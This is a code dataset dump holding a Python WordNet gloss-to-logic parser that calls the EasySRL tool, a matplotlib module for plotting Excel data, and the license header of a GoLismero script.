transformed_glosses.split(\"\\n\")]\n\n\t\treturn self._extend_glosses_with_transformations(transformed_glosses_list)\n\n\tdef _extend_glosses_with_transformations(self, transformed_gloss_strings):\n\t\t\"\"\"Extend the glosses with the transformations to LogicallyTransformed Glosses.\"\"\"\n\t\tprint(\"...parsing transformations\")\n\t\ttransformed_glosses = {}\n\n\t\tself._mappable_predicates = 0\n\t\tself._mapped_predicates = 0\n\n\t\tfor i, gloss_key in enumerate(self._gloss_order):\n\t\t\tgloss = self.glosses[gloss_key]\n\t\t\tgloss_transformation_string = transformed_gloss_strings[i]\n\n\t\t\tif gloss_transformation_string != \"EMPTY\":\n\t\t\t\tparsed_transformation = 
GlossTransformer.parse_logic_transformation(gloss_transformation_string)\n\n\t\t\t\tif gloss_key not in transformed_glosses:\n\t\t\t\t\ttransformed_glosses[gloss_key] = gloss.gloss_to_transformed_gloss([gloss_transformation_string], [self._extract_entities_from_transformation(gloss_key, gloss_transformation_string, parsed_transformation)], [parsed_transformation])\n\t\t\t\telse:\n\t\t\t\t\ttransformed_glosses[gloss_key].transformed_gloss_strings.append(gloss_transformation_string)\n\t\t\t\t\ttransformed_glosses[gloss_key].transformed_gloss_entities.append(self._extract_entities_from_transformation(gloss_key, gloss_transformation_string, parsed_transformation))\n\t\t\t\t\ttransformed_glosses[gloss_key].transformed_gloss_parsed.append(parsed_transformation)\n\n\t\tprint(\"...of {0} predicates in the transformation {1} ({2}) could be mapped to a key.\".format(self._mappable_predicates, self._mapped_predicates, round(self._mapped_predicates/float(self._mappable_predicates)*100, 2)))\n\n\t\treturn transformed_glosses\n\n\t@staticmethod\n\tdef parse_logic_transformation(transformation):\n\t\t\"\"\"Parse a logic transformation into a python-readable representation of lists and tuples.\"\"\"\n\t\tpredicate_argument_pattern = re.compile(r\"([^()\\[\\],&|{}]+)|\\s*([|,()\\[\\]{}&])\\s*\")\n\t\tif transformation.count(\"(\") != transformation.count(\")\"):\n\t\t\traise SyntaxError(\"Unmatching amount of brackets\\n{0}!\".format(transformation))\n\n\t\targs = []\n\t\tcurrent_element = None # may be a single element or a function with its arguments\n\t\tstate = 0 # 0 -> before element, 1 -> after element, 2 -> after closing bracket, 3 -> after round opening bracket; 3 implies 0\n\t\tstack = [] # remembers the last arg/current_element before the current level was entered\n\t\texistential_skopus = False # tracks whether an existential skopus has been opened in the last step\n\n\t\tfor match in predicate_argument_pattern.finditer(transformation):\n\t\t\t# handle predicates\n\t\t\tif match.group(1):\n\t\t\t\tif state == 1: raise RuntimeError(\"Regex failed; Expected argument structure for last element at {0}\\n{1}!\".format(match.start(), transformation))\n\t\t\t\tif state == 2: print((\"Missing control symbol for argument listing at {0}\\n{1}!\".format(match.start(), transformation)))\n\n\t\t\t\tcurrent_element = match.group(1)\n\t\t\t\tstate = 1\n\n\t\t\t# handle control symbols\n\t\t\telif match.group(2) in \"([{\":\n\n\t\t\t\tif match.group(2) == \"{\":\n\t\t\t\t\tcurrent_element = \"OR\"\n\t\t\t\t\tstate = 0\n\t\t\t\telif match.group(2) == \"[\":\n\t\t\t\t\texistential_skopus = True\n\t\t\t\t\tstate = 0\n\t\t\t\telif match.group(2) == \"(\":\n\t\t\t\t\tif state == 3: current_element = \"OR\"\n\t\t\t\t\tif existential_skopus:\n\t\t\t\t\t\tcurrent_element = \"EXISTENTIAL_SKOPUS\"\n\t\t\t\t\t\texistential_skopus = False\n\n\t\t\t\t\tstate = 3\n\n\t\t\t\tstack.append((args, current_element)) # a new argument structure begins so remember the old level\n\t\t\t\tcurrent_element = None\n\t\t\t\targs = []\n\n\t\t\telif match.group(2) in \")]}\":\n\t\t\t\t# if there is nothing in the stack, then there was no opening bracket for this closing bracket\n\t\t\t\tif not stack: print((\"unmatched closing bracket at {0}\\n{1}\".format(match.start(), transformation)))\n\t\t\t\t# if the last element was either an single element or a predicate+argument than add this to the args of the current level\n\t\t\t\tif state != 0 and state != 3: args.append(current_element)\n\n\t\t\t\t# then close the level by using the higher 
level current element (which should be a predicate) and the current args as new current element\n\t\t\t\t# and setting the current args equal to the higher level args\n\t\t\t\t# this means: go one level higher and add this level to the higher level as an argument\n\t\t\t\tpredicate_args = args\n\t\t\t\targs, current_element = stack.pop()\n\t\t\t\tcurrent_element = (current_element, predicate_args)\n\n\t\t\t\tstate = 2\n\n\t\t\telif match.group(2) in \",&\":\n\t\t\t\tif state != 0 and state != 3: args.append(current_element)\n\t\t\t\tcurrent_element = None\n\t\t\t\tstate = 0\n\n\t\t\telif match.group(2) == \"|\":\n\t\t\t\tif state == 0 and state == 3:\n\t\t\t\t\traise SyntaxError(\"Found | after opening bracket at {0}\\n{1}!\".format(match.start(), transformation))\n\t\t\t\targs.append(current_element)\n\t\t\t\tcurrent_element = \"WRAPPER\"\n\t\t\t\tstate = 0\n\n\t\tif state != 0: args.append(current_element)\n\n\t\treturn args\n\n\n\tdef _extract_entities_from_transformation(self, gloss_key, transformed_gloss, parsed_logic_transformation):\n\t\t\"\"\"Extract entities from the transformation and preextract some information about them.\"\"\"\n\t\toutput = {}\n\t\tgloss = self.glosses[gloss_key]\n\n\t\t# collect all entities and events\n\t\tvariables = re.findall(r\"([#∃]+)([a-z\\']+)\\.?\", transformed_gloss)\n\n\t\t# DEPRECATED\n\t\t# predicate_pattern = regex.compile(r\"(\\w+)(?=\\(((?:[^()]*\\((?2)\\)|[^()])*)\\))\")\n\t\t# predicates_with_contents = predicate_pattern.findall(transformed_gloss)\n\n\t\t# find relevant information per variable\n\t\tfor v_tuple in variables:\n\t\t\tv_quantifier, v = v_tuple\n\t\t\t# determine the variables type\n\t\t\tif re.match(\"[xyzuv]'*\", v):\n\t\t\t\tvariable_type = \"entity\"\n\t\t\telif re.match(\"e'*\", v):\n\t\t\t\tvariable_type = \"event\"\n\t\t\telif re.match(\"[pqr]'*\", v):\n\t\t\t\tvariable_type = \"other\"\n\t\t\telse:\n\t\t\t\tself._log_error(\"WARNING: unhandled variable symbol {0}\".format(v), gloss_key)\n\n\t\t\t# get all predicates that ONLY contain the variable and therefore modify it directly\n\t\t\tall_predicates = find_predicates(parsed_logic_transformation, r\"([#∃][a-z]\\'*\\.)?([a-z]+)\")\n\t\t\tvariable_predicates = set([re.search(r\"([#∃][a-z]\\'*\\.)?([a-z]+)\", predicates[0]).group(2) for predicates in all_predicates if len(predicates[1]) == 1 and v in predicates[1]])\n\n\t\t\t# map predicates with senses\n\t\t\tdisambiguated_variable_predicates = self._map_senses_to_predicates(variable_predicates, gloss)\n\n\t\t\t# initialize the transformation parse dict with general information that all variable types need\n\t\t\toutput[v] = {\n\t\t\t\t\"type\": variable_type,\n\t\t\t\t\"predicates\": disambiguated_variable_predicates,\n\t\t\t\t\"quantifier\": {\"#\": \"lambda\", \"∃\": \"existential\"}[v_quantifier],\n\t\t\t}\n\n\t\t\t# add special event information\n\t\t\tif variable_type == \"entity\":\n\t\t\t\tentity_arguments = [arg for arg in find_predicates(parsed_logic_transformation, \"ARG\") if arg[1][-1] == v]\n\n\t\t\t\toutput[v].update({\n\t\t\t\t\t\t\"arguments\": {}\n\t\t\t\t})\n\n\t\t\t\tfor arg in entity_arguments:\n\t\t\t\t\t# any argument needs to be a list in case a coordination implies multiple arguments at the same position\n\t\t\t\t\targument = arg[1][:-1]\n\n\t\t\t\t\t# add the arguments to the output\n\t\t\t\t\tif arg[0] not in output[v][\"arguments\"]:\n\t\t\t\t\t\toutput[v][\"arguments\"].update({arg[0]: [argument]})\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput[v][\"arguments\"][arg[0]].append(argument)\n\n\t\t\tif 
variable_type == \"event\":\n\t\t\t\tevent_arguments = [arg for arg in find_predicates(parsed_logic_transformation, \"ARG[A-Z0-9]?\") if arg[1][-1] == v]\n\n\t\t\t\toutput[v].update({\n\t\t\t\t\t\t\"arguments\": {}\n\t\t\t\t})\n\n\t\t\t\tfor arg in event_arguments:\n\t\t\t\t\t# any argument needs to be a list in case a coordination implies multiple arguments at the same position\n\t\t\t\t\targument = arg[1][:-1]\n\n\t\t\t\t\t# add the arguments to the output\n\t\t\t\t\tif arg[0] not in output[v][\"arguments\"]:\n\t\t\t\t\t\toutput[v][\"arguments\"].update({arg[0]: [argument]})\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput[v][\"arguments\"][arg[0]].append(argument)\n\n\n\t\treturn output\n\n\tdef _map_senses_to_predicates(self, variable_predicates, gloss):\n\t\t\"\"\"Map the sense keys from the Gloss Tokens to the according predicates in the transformation. ~90% successrate...\"\"\"\n\t\tdisambiguated_variable_predicates = []\n\t\tgloss_token_stack = gloss.tokens.copy()\n\n\t\tfor i, pred in enumerate(variable_predicates):\n\t\t\tself._mappable_predicates += 1\n\t\t\tpredicate_sense = \"UNKNOWN\"\n\t\t\tfor token_id in sorted(gloss_token_stack.keys()):\n\t\t\t\ttoken = gloss.tokens[token_id]\n\t\t\t\tif pred.lower() in token.lemma_strings or (type(token) == CollocationHead and pred.lower() in [coll.split(\"_\")[0] for coll in token.lemma_strings]):\n\t\t\t\t\tif type(token) == CollocationMember:\n\t\t\t\t\t\tfor i in gloss.tokens:\n\t\t\t\t\t\t\tt = gloss.tokens[i]\n\t\t\t\t\t\t\tif type(t) == CollocationHead:\n\t\t\t\t\t\t\t\t# there are some odd cases where the member has two heads, heuristacally the first head will be taken\n\t\t\t\t\t\t\t\tif token.collocation_id[0] in t.collocation_id:\n\t\t\t\t\t\t\t\t\tcoll_head = t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcoll_head = None # actually if this happens an error occurs\n\n\t\t\t\t\t\tpredicate_sense = coll_head.collocation_wn_sense_key\n\t\t\t\t\telif type(token) == CollocationHead:\n\t\t\t\t\t\tpredicate_sense = token.collocation_wn_sense_key\n\t\t\t\t\telse:\n\t\t\t\t\t\tpredicate_sense = token.wn_sense_key\n\t\t\t\t\tgloss_token_stack.pop(token_id)\n\t\t\t\t\tself._mapped_predicates += 1\n\t\t\t\t\tbreak\n\n\t\t\tdisambiguated_variable_predicates.append((pred, predicate_sense))\n\n\t\treturn disambiguated_variable_predicates\n\n\tdef _apply_transformation_tool(self, gloss_corpus):\n\t\t\"\"\"Apply EasySRL via subprocess to transform the glosses.\"\"\"\n\t\twith open(\"gloss_corpus.tmp\", \"w\") as f:\n\t\t\tf.write(gloss_corpus)\n\n\t\ttry:\n\t\t\tparser_output = sp.check_output(\"java -Xmx2g -jar src/tools/easysrl/easysrl.jar --model src/tools/easysrl/model/ --maxLength 150 --outputFormat {0} --inputFile gloss_corpus.tmp 2>{1}\".format(self._transformation_type, self._logfile+\".parser_log\"), shell=True, universal_newlines=True)\n\t\texcept sp.CalledProcessError as e:\n\t\t\treturn e.output\n\n\t\tos.remove(\"gloss_corpus.tmp\")\n\n\t\treturn parser_output\n\n\tdef _build_gloss_corpus(self, glosses, ignore_parenthesis_content=True):\n\t\t\"\"\"Create a corpus of glosses in a file, meant to be read and transformed by EasySRL.\"\"\"\n\t\tgloss_corpus = \"\"\n\t\tcorpus_gloss_order = [] # gloss order for the corpus, including duplicate entries for glosses with multiple definitions\n\n\t\tfor gloss_key in self._gloss_order:\n\t\t\tgloss = self.glosses[gloss_key]\n\t\t\tgloss_definitions = gloss.gloss_definitions\n\t\t\tfor definition in gloss_definitions:\n\t\t\t\tgloss_text = re.sub(r\"[.,;:?!]\", \" \\g<0> \", 
definition)\n\t\t\t\tgloss_text = re.sub(r\"'(s)\", \"\\g<1>\", gloss_text)\n\t\t\t\tif ignore_parenthesis_content:\n\t\t\t\t\tgloss_text = re.sub(r\"\\(.*?\\)\", \"\", gloss_text)\n\t\t\t\t\tgloss_text = re.sub(r\"[()]\", \"\", gloss_text)\n\t\t\t\telse:\n\t\t\t\t\tgloss_text = re.sub(r\"\\(\", \" -LRB- \", gloss_text)\n\t\t\t\t\tgloss_text = re.sub(r\"\\)\", \" -RRB- \", gloss_text)\n\n\t\t\t\tgloss_text = re.sub(r\"(\\s)+\", \"\\\\1\", gloss_text)\n\n\t\t\t\tif gloss_text != \"\":\n\t\t\t\t\tgloss_corpus += gloss_text + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\tgloss_corpus += \"PLACEHOLDER\" + \"\\n\"\n\t\t\t\t\tself._log_error(\"WARNING: Empty Gloss\", gloss)\n\n\t\t\t\tcorpus_gloss_order.append(gloss_key)\n\n\t\t# save gloss corpus to file for debugging purposes\n\t\twith open(\"gloss_corpus.txt\", \"w\") as f:\n\t\t\tf.write(gloss_corpus)\n\n\t\tself._gloss_order = corpus_gloss_order\n\t\treturn gloss_corpus\n\n\tdef _log_error(self, message, gloss):\n\t\t\"\"\"Log potential Errors/Warnings to the logfile.\"\"\"\n\t\twith open(self._logfile, \"a\") as f:\n\t\t\tf.write(\"{0}\\n\\t\\t{1}\\n\".format(message, gloss))\n\nif __name__ == \"__main__\":\n\timport timeit\n\timport regex\n\tfrom pprint import pprint\n\n\twith open(\"extracted_data/transformations_100.txt\", \"r\") as f:\n\t\tcorpus = f.read().split(\"\\n\")[1:]\n\n\ttest_string = \"sk(#x.(phrase(x)&∃e[(use(e)&ARG1(x,e)&∃e'[∃y[(say(e')&ARG0(y,e')&∃e''[(examine(e'')&ARG1(sk(#z.publication(z)),e'')&contain(e'')&ARG0(sk(#z.publication(z)),e'')&∃e'''[(offensive(e''')&ARG(sk(#u.nothing(u)),e''')&to(sk(#v.church(v)),e''')&ARG1(e''',e''))]&ARG1(sk(#u.nothing(u)),e'')&ARG1(e'',e'))]&ARG(e',e))]]&ARG(sk(#x'.(censor(x')&ARG(sk(#y'.roman-catholic-church(y')),x')&official(x'))),e))]))\"\n\n\ttic_r = timeit.default_timer()\n\tpredicate_pattern = regex.compile(r\"(\\w+)(?=\\(((?:[^()]*\\((?2)\\)|[^()])*)\\))\")\n\tpredicates_with_contents = predicate_pattern.findall(test_string)\n\ttoc_r = timeit.default_timer()\n\n\ttic_p = timeit.default_timer()\n\tp = GlossTransformer.parse_logic_transformation(test_string)\n\tpreds = find_predicates(p, \"[a-z]+\")\n\tpprint(p)\n\ttoc_p = timeit.default_timer()\n\n\tprint(\"Regex: {0}s\\nParser: {1}s\".format(toc_r - tic_r, toc_p - tic_p))\n","repo_name":"weidler/enhanced-wordnet","sub_path":"src/glosses/GlossTransformation.py","file_name":"GlossTransformation.py","file_ext":"py","file_size_in_byte":15351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"45521529713","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.ticker as ticker\nfrom dataclasses import dataclass, field\nfrom typing import Optional\nfrom openpyxl.utils import column_index_from_string\nfrom multiprocessing import Process\nimport scienceplots\nimport japanize_matplotlib\n\n\n@dataclass\nclass Lim:\n min: float\n max: float\n\n def copy_with(self, min: Optional[float] = None, max: Optional[float] = None):\n return Lim(\n min=min if min is not None else self.min,\n max=max if max is not None else self.max,\n )\n\n\n@dataclass\nclass Axis:\n major: Optional[list[float]] = None\n minor: Optional[float] = None\n lim: Optional[Lim] = None\n\n def copy_with(\n self,\n major: Optional[list[float]] = None,\n minor: Optional[float] = None,\n lim: Optional[Lim] = None,\n ):\n return Axis(\n major=major if major is not None else self.major,\n minor=minor if minor is not None else self.minor,\n lim=lim if lim is not None else self.lim,\n )\n\n\n@dataclass\nclass 
LogAxis:\n major: Optional[list[float]] = None\n minor: Optional[bool] = None\n lim: Optional[Lim] = None\n\n def copy_with(\n self,\n major: Optional[list[float]] = None,\n minor: Optional[bool] = None,\n lim: Optional[Lim] = None,\n ):\n return LogAxis(\n major=major if major is not None else self.major,\n minor=minor if minor is not None else self.minor,\n lim=lim if lim is not None else self.lim,\n )\n\n\n@dataclass\nclass Label:\n xlabel: list[str] = field(default_factory=list)\n y1label: list[str] = field(default_factory=list)\n y2label: list[str] = field(default_factory=list)\n\n def copy_with(\n self,\n xlabel: Optional[list[str]] = None,\n y1label: Optional[list[str]] = None,\n y2label: Optional[list[str]] = None,\n ):\n return Label(\n xlabel=xlabel if xlabel is not None else self.xlabel,\n y1label=y1label if y1label is not None else self.y1label,\n y2label=y2label if y2label is not None else self.y2label,\n )\n\n\n@dataclass\nclass Sheet:\n excel_file: str\n sheet_name: str\n skiprows: Optional[int] = None\n\n def __post_init__(self):\n self.df_excel = pd.read_excel(\n self.excel_file,\n sheet_name=self.sheet_name,\n skiprows=self.skiprows,\n )\n\n\n@dataclass\nclass Marker:\n marker: Optional[str] = None\n markersize: Optional[float] = None\n ls: Optional[str] = None\n color: Optional[str] = None\n\n def copy_with(\n self,\n marker: Optional[str] = None,\n markersize: Optional[float] = None,\n ls: Optional[str] = None,\n color: Optional[str] = None,\n ):\n return Marker(\n marker=marker if marker is not None else self.marker,\n markersize=markersize if markersize is not None else self.markersize,\n ls=ls if ls is not None else self.ls,\n color=color if color is not None else self.color,\n )\n\n\n@dataclass\nclass Data:\n x_col: str\n y_col: str\n legend: bool = True\n marker: Optional[Marker] = None\n label: Optional[str] = None\n sheet: Optional[Sheet] = None\n\n def __post_init__(self):\n self.x = column_index_from_string(self.x_col) - 1\n self.y = column_index_from_string(self.y_col) - 1\n\n def copy_with(\n self,\n x_col: Optional[str] = None,\n y_col: Optional[str] = None,\n legend: Optional[bool] = None,\n marker: Optional[Marker] = None,\n label: Optional[str] = None,\n sheet: Optional[Sheet] = None,\n ):\n return Data(\n x_col=x_col if x_col is not None else self.x_col,\n y_col=y_col if y_col is not None else self.y_col,\n legend=legend if legend is not None else self.legend,\n marker=marker if marker is not None else self.marker,\n label=label if label is not None else self.label,\n sheet=sheet if sheet is not None else self.sheet,\n )\n\n def set_sheet(self, sheet: Optional[Sheet] = None):\n self.sheet = self.sheet or sheet\n\n def set_data(self):\n if self.sheet is not None:\n self.x_data = self.sheet.df_excel[self.sheet.df_excel.columns[self.x]]\n self.y_data = self.sheet.df_excel[self.sheet.df_excel.columns[self.y]]\n self.label = r\"{0}\".format(self.label)\n self.x_label = r\"{0}\".format(self.sheet.df_excel.columns[self.x])\n self.y_label = r\"{0}\".format(self.sheet.df_excel.columns[self.y])\n\n\n@dataclass\nclass BaseLine:\n value: float\n legend: bool = True\n label: Optional[str] = None\n linestyle: Optional[str] = None\n color: Optional[str] = None\n lim: Optional[Lim] = None\n\n def copy_with(\n self,\n value: Optional[float] = None,\n legend: Optional[bool] = None,\n label: Optional[str] = None,\n linestyle: Optional[str] = None,\n color: Optional[str] = None,\n lim: Optional[Lim] = None,\n ):\n return BaseLine(\n value=value if value is not None else 
self.value,\n legend=legend if legend is not None else self.legend,\n label=label if label is not None else self.label,\n linestyle=linestyle if linestyle is not None else self.linestyle,\n color=color if color is not None else self.color,\n lim=lim if lim is not None else self.lim,\n )\n\n\n@dataclass\nclass Graph:\n out_file: str\n data: list[Data]\n data2: Optional[list[Data]] = None\n vertical_base_line: Optional[list[BaseLine]] = None\n horizontal_base_line: Optional[list[BaseLine]] = None\n sheet: Optional[Sheet] = None\n marker: Optional[list[Marker]] = None\n x_axis: Optional[Axis | LogAxis] = None\n y1_axis: Optional[Axis | LogAxis] = None\n y2_axis: Optional[Axis | LogAxis] = None\n x_label: list[str] = field(default_factory=list)\n y1_label: list[str] = field(default_factory=list)\n y2_label: list[str] = field(default_factory=list)\n\n def __post_init__(self):\n self.figure = plt.figure()\n for data in self.data:\n data.set_sheet(self.sheet)\n data.set_data()\n self.ax = self.figure.add_subplot(1, 1, 1)\n self.ax.set_box_aspect(1)\n if self.data2 is not None:\n for data2 in self.data2:\n data2.set_sheet(self.sheet)\n data2.set_data()\n self.ax2 = self.ax.twinx()\n self.ax2.set_box_aspect(1)\n else:\n self.ax2 = None\n\n def copy_with(\n self,\n out_file: Optional[str] = None,\n data: Optional[list[Data]] = None,\n data2: Optional[list[Data]] = None,\n vertical_base_line: Optional[list[BaseLine]] = None,\n horizontal_base_line: Optional[list[BaseLine]] = None,\n sheet: Optional[Sheet] = None,\n marker: Optional[list[Marker]] = None,\n x_axis: Optional[Axis | LogAxis] = None,\n y1_axis: Optional[Axis | LogAxis] = None,\n y2_axis: Optional[Axis | LogAxis] = None,\n x_label: Optional[list[str]] = None,\n y1_label: Optional[list[str]] = None,\n y2_label: Optional[list[str]] = None,\n ):\n return Graph(\n out_file=out_file if out_file is not None else self.out_file,\n data=data if data is not None else self.data,\n data2=data2 if data2 is not None else self.data2,\n vertical_base_line=vertical_base_line\n if vertical_base_line is not None\n else self.vertical_base_line,\n horizontal_base_line=horizontal_base_line\n if horizontal_base_line is not None\n else self.horizontal_base_line,\n sheet=sheet if sheet is not None else self.sheet,\n marker=marker if marker is not None else self.marker,\n x_axis=x_axis if x_axis is not None else self.x_axis,\n y1_axis=y1_axis if y1_axis is not None else self.y1_axis,\n y2_axis=y2_axis if y2_axis is not None else self.y2_axis,\n x_label=x_label if x_label is not None else self.x_label,\n y1_label=y1_label if y1_label is not None else self.y1_label,\n y2_label=y2_label if y2_label is not None else self.y2_label,\n )\n\n def plot(self):\n for i, d in enumerate(self.data):\n self.ax.plot(\n d.x_data,\n d.y_data,\n label=d.label,\n markersize=d.marker.markersize\n if d.marker is not None\n else self.marker[i % len(self.marker)].markersize\n if self.marker is not None\n else None,\n marker=d.marker.marker\n if d.marker is not None\n else self.marker[i % len(self.marker)].marker\n if self.marker is not None\n else None,\n ls=d.marker.ls\n if d.marker is not None\n else self.marker[i % len(self.marker)].ls\n if self.marker is not None\n else None,\n color=d.marker.color\n if d.marker is not None\n else self.marker[i % len(self.marker)].color\n if self.marker is not None\n else None,\n )\n if self.data2 is not None and self.ax2 is not None:\n for i, d in enumerate(self.data2):\n self.ax2.plot(\n d.x_data,\n d.y_data,\n label=d.label,\n 
markersize=d.marker.markersize\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].markersize\n if self.marker is not None\n else None,\n marker=d.marker.marker\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].marker\n if self.marker is not None\n else None,\n ls=d.marker.ls\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].ls\n if self.marker is not None\n else None,\n color=d.marker.color\n if d.marker is not None\n else self.marker[(i + len(self.data)) % len(self.marker)].color\n if self.marker is not None\n else None,\n )\n if self.vertical_base_line is not None:\n for line in self.vertical_base_line:\n if self.ax2 is None:\n self.ax.axvline(\n x=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n ymax=line.lim.max if line.lim is not None else 1,\n ymin=line.lim.min if line.lim is not None else 0,\n )\n else:\n self.ax2.axvline(\n x=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n ymax=line.lim.max if line.lim is not None else 1,\n ymin=line.lim.min if line.lim is not None else 0,\n )\n if self.horizontal_base_line is not None:\n for line in self.horizontal_base_line:\n if self.ax2 is None:\n self.ax.axhline(\n y=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n xmax=line.lim.max if line.lim is not None else 1,\n xmin=line.lim.min if line.lim is not None else 0,\n )\n else:\n self.ax2.axhline(\n y=line.value,\n label=line.label,\n ls=line.linestyle,\n color=line.color,\n xmax=line.lim.max if line.lim is not None else 1,\n xmin=line.lim.min if line.lim is not None else 0,\n )\n\n def set_label(self):\n if self.x_label == []:\n self.ax.set_xlabel(self.data[0].x_label)\n else:\n self.ax.set_xlabel(\"\\n\".join(self.x_label))\n if self.y1_label == []:\n self.ax.set_ylabel(self.data[0].y_label)\n else:\n self.ax.set_ylabel(\"\\n\".join(self.y1_label))\n if self.ax2 is not None and self.data2 is not None:\n if self.y2_label == []:\n self.ax2.set_ylabel(self.data2[0].y_label)\n else:\n self.ax2.set_ylabel(\"\\n\".join(self.y2_label))\n\n def set_axis(self):\n if isinstance(self.x_axis, Axis):\n if self.x_axis.lim is not None:\n self.ax.set_xlim(self.x_axis.lim.min, self.x_axis.lim.max)\n if self.x_axis.major is not None:\n self.ax.set_xticks(self.x_axis.major)\n if self.x_axis.minor is not None:\n self.ax.xaxis.set_minor_locator(\n ticker.MultipleLocator(self.x_axis.minor),\n )\n else:\n self.ax.xaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n elif isinstance(self.x_axis, LogAxis):\n self.ax.set_xscale(\"log\")\n if self.x_axis.lim is not None:\n self.ax.set_xlim(self.x_axis.lim.min, self.x_axis.lim.max)\n if self.x_axis.major is not None:\n self.ax.set_xticks(self.x_axis.major)\n if self.x_axis.minor is not None:\n self.ax.xaxis.set_minor_locator(\n ticker.LogLocator(\n numticks=14,\n subs=(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n )\n )\n else:\n self.ax.xaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n if isinstance(self.y1_axis, Axis):\n if self.y1_axis.lim is not None:\n self.ax.set_ylim(self.y1_axis.lim.min, self.y1_axis.lim.max)\n if self.y1_axis.major is not None:\n self.ax.set_yticks(self.y1_axis.major)\n if self.y1_axis.minor is not None:\n self.ax.yaxis.set_minor_locator(\n ticker.MultipleLocator(self.y1_axis.minor),\n )\n else:\n self.ax.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n elif isinstance(self.y1_axis, LogAxis):\n self.ax.set_yscale(\"log\")\n if self.y1_axis.lim is 
not None:\n self.ax.set_ylim(self.y1_axis.lim.min, self.y1_axis.lim.max)\n if self.y1_axis.major is not None:\n self.ax.set_yticks(self.y1_axis.major)\n if self.y1_axis.minor is not None:\n self.ax.yaxis.set_minor_locator(\n ticker.LogLocator(\n numticks=14,\n subs=(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n )\n )\n else:\n self.ax.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n if self.ax2 is not None and isinstance(self.y2_axis, Axis):\n if self.y2_axis.lim is not None:\n self.ax2.set_ylim(self.y2_axis.lim.min, self.y2_axis.lim.max)\n if self.y2_axis.major is not None:\n self.ax2.set_yticks(self.y2_axis.major)\n if self.y2_axis.minor is not None:\n self.ax2.yaxis.set_minor_locator(\n ticker.MultipleLocator(self.y2_axis.minor),\n )\n else:\n self.ax2.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n elif self.ax2 is not None and isinstance(self.y2_axis, LogAxis):\n self.ax2.set_yscale(\"log\")\n if self.y2_axis.lim is not None:\n self.ax2.set_ylim(self.y2_axis.lim.min, self.y2_axis.lim.max)\n if self.y2_axis.major is not None:\n self.ax2.set_yticks(self.y2_axis.major)\n if self.y2_axis.minor is not None:\n self.ax2.yaxis.set_minor_locator(\n ticker.LogLocator(\n numticks=14,\n subs=(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n )\n )\n else:\n self.ax2.yaxis.set_minor_locator(\n ticker.NullLocator(),\n )\n\n def set_legend(self):\n h, l = self.ax.get_legend_handles_labels()\n h2, l2 = (\n self.ax2.get_legend_handles_labels() if self.ax2 is not None else ([], [])\n )\n legend = (\n [d.legend for d in self.data]\n + [d.legend for d in self.data2 or []]\n + [line.legend for line in self.vertical_base_line or []]\n + [line.legend for line in self.horizontal_base_line or []]\n )\n empty_l = [(l + l2)[i] for i, le in enumerate(legend) if le]\n empty_h = [(h + h2)[i] for i, le in enumerate(legend) if le]\n self.ax.legend(\n empty_h,\n empty_l,\n loc=\"best\",\n frameon=False,\n fancybox=False,\n framealpha=1,\n )\n\n def save(self):\n self.ax.tick_params(axis=\"both\", direction=\"in\", which=\"both\")\n # self.ax2.tick_params(axis=\"both\", direction=\"in\", which=\"both\")\n # self.ax.tick_params(\n # labelbottom=False, labelleft=False, labelright=False, labeltop=False\n # )\n # self.ax.tick_params(bottom=False, left=False, right=False, top=False)\n # self.ax.axis(\"off\")\n self.figure.savefig(self.out_file)\n\n def execute(self):\n self.plot()\n print(f\"plot {self.out_file}\")\n self.set_label()\n print(f\"set label {self.out_file}\")\n self.set_axis()\n print(f\"set axis {self.out_file}\")\n self.set_legend()\n print(f\"set legend {self.out_file}\")\n self.save()\n print(f\"save {self.out_file}\")\n\n\ndef make_graph(\n graphs: list[Graph],\n multiprocessing: bool = True,\n):\n plt.style.use([\"science\", \"ieee\"])\n if multiprocessing:\n threads: list[Process] = []\n for graph in graphs:\n t = Process(target=graph.execute)\n t.start()\n threads.append(t)\n for thread in threads:\n thread.join()\n else:\n for graph in graphs:\n graph.execute()\n","repo_name":"m20079/AM-radio","sub_path":"python/make_graph.py","file_name":"make_graph.py","file_ext":"py","file_size_in_byte":18969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39281533872","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__license__ = \"\"\"\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2014\n\nGolismero project site: https://github.com/golismero\nGolismero project mail: contact@golismero-project.com\n\nThis program is free 
software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\"\"\"\n\n# Fix the module path.\nimport sys\nimport os\nfrom os import path\nhere = path.split(path.abspath(__file__))[0]\nif not here: # if it fails use cwd instead\n here = path.abspath(os.getcwd())\ngolismero = path.join(here, \"..\", \"..\")\nthirdparty_libs = path.join(golismero, \"thirdparty_libs\")\nif path.exists(thirdparty_libs):\n 